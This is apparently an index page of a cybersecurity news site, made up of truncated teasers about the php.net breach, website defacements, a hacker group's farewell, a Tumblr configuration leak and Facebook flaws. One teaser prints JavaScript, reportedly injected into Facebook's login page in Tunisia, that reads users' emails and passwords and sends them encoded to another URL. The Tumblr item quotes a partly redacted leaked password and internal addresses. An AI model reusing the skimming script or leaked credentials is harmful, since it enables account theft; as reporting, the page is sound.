The Hacker News | #1 Trusted Source for Cybersecurity News — Index Page

The PHP Group has confirmed the compromise of their server ! In our last post we post that, Php.net got Compromised , Read here  . Today finaly PHP group has announce that they was really got hacked,as shown in above image. Link :  https://www.php.net/archive/2011.php#id2011-03-19-2

3 websites hacked By Rao Assasin Hacker ! Hacked sites :  https://www.zooguiden.com/index.html https://www.ridleder.com/index.html https://www.bcwater.gov.cn/index.html News Source : Rao Assasin Hacker

Paki UrduHack Security Team Is No More ! The UrduHack Team Said This: I HAVE FINALLY DECIDED TO SHUTDOWN THIS SITE AND PAKI URDUHACK SECURITY TEAM FOREVER. FROM THIS MOMENT FORWARD,URDUHACK TEAM IS NO MORE,IT'S BEEN A WONDERFULL JOURNEY. DUE TO PERSONAL LIFE MATTER'S I DECIDED TO SHUTDOWN URDUHACK SECURITY TEAM.IF ANYONE USE OUR NAME OR ANYTHING ,I AM NOT RESPONSIBLE FOR HIS ACTIONS.I STARTED THIS TEAM 4 YEARS AGO ALONE BY MYSELF,DURING MY JOURNEY I MET WITH GREAT GOOD PEOPLES AND SOME BAD ONES ALSO.I DEDICATED ALL MY WORK TO MY LATE BROTHER CODE-5 ,WHO IS NO LONGER WITH ME,HE WILL BE ALWAYS REMEMBERED IN MY HEART.I WOULD LIKE TO THANK MY DEAREST FRIEND SHOZY,WHO SUPPORTED ME IN SO MANY WAYS,I CANNOT DEFINE IN WORDS.THE CONTROL OF THIS DOMAIN WILL BE IN ARSLAN HAND, HE OWN THIS DOMAIN NAME AND EVERYTHING RELATED HOST AND EVERYTHING,IF I EVER HURT ANYONE FOR THAT I AM REALLY SORRY,PLEASE FORGIVE ME. A MESSAGE FOR NEW YOUNGSTERS FROM PAKISTAN. PLEASE PLEASE PLEASE DON'T W...

Python supply chain attacks are surging in 2025. Join our webinar to learn how to secure your code, dependencies, and runtime with modern tools and strategies.

40 websites defaced by A42 & skywalk3r (Team Greyhat) Hacked sites list :  https://pastebin.com/HUNLSXcQ News Source : A42 & skywalk3r (Team Greyhat)

You perhaps have followed the recent actualities about Tunisian Government stealing accounts on facebook. Read More Here ... There's how they do: Here's the web page of Facebook as seen when you're connected in Tunisia https://pastebin.com/WV0C9t0F Let's take a look at that javascript curious part.. !-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "https://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else...

Update : Tumblr security flaw, Clarification by Tumblr official staff ! : The Hacker News ~ https://www.thehackernews.com/2011/03/tumblr-security-flaw-clarification-by.html There is a possible security issue with Tumblr. Basically a lot of confidential information, including server IPS, API keys, passwords, etc were leaked. There are some of the stuff that got disclosed: Database::set_defaults(array(  'user' => 'tumblr3′, 'password' => 'm3MpH1C0Koh39….55Z8YWStbgTmcgQWJvFt4′,  .. define('MEMCACHE_HOST', '10.252.0.68′); define('MEMCACHE_VERSION_HOST', ' 10.252.0.67 '); Database::add('primary', array('host' =>  '192.168.200.142 ')); .. We redacted a bit to protect the innocent, but anyone can find it on Google. So what is going on? Did they got hacked somehow? We don't think so… By looking at the disclosed data dump, it looks like one of their developers make a little mistake: i?php require_once('chorus/Utils.php'); Can you see it above? Instead of starting ...

The latest Web app attacks and countermeasures from world-renowned practitioners. Protect your Web applications from malicious attacks by mastering the weapons and thought processes of today's hacker. Written by recognized security practitioners and thought leaders, Hacking Exposed Web Applications, Third Edition is fully updated to cover new infiltration methods and countermeasures. Find out how to reinforce authentication and authorization, plug holes in Firefox and IE, reinforce against injection attacks, and secure Web 2.0 features. Integrating security into the Web development lifecycle (SDL) and into the broader enterprise information security program is also covered in this comprehensive resource. Get full details on the hacker's footprinting, scanning, and profiling tools, including SHODAN, Maltego, and OWASP DirBuster See new exploits of popular platforms like Sun Java System Web Server and Oracle WebLogic in operation Understand how attackers defeat commonly used Web authe...

Facebook  bypass of the cache servers , Check who visits your profile ! Summary Let me explain a security flaw in Facebook in relation to their cache servers, which form a layer between the Internet and internal multimedia content (photos and videos uploaded). This ruling, allows access to raw browser requests of our friends, allowing private information of these people ( web-bug ), or use as a bridge to take advantage of other external vulnerability ( CSRF ). Facebook and intermediate layer Many times you have seen this "use this application and find out who visits your profile, right?, Well, this will always be a  fake,  because Facebook is designed in a way that makes it impossible. If you look, when you go up a photo like the profile, it is resized, compressed, and stored on Facebook's own server. Actually, there are hundreds of servers, which form what is called a CDN . An example of profile photo: https://profile...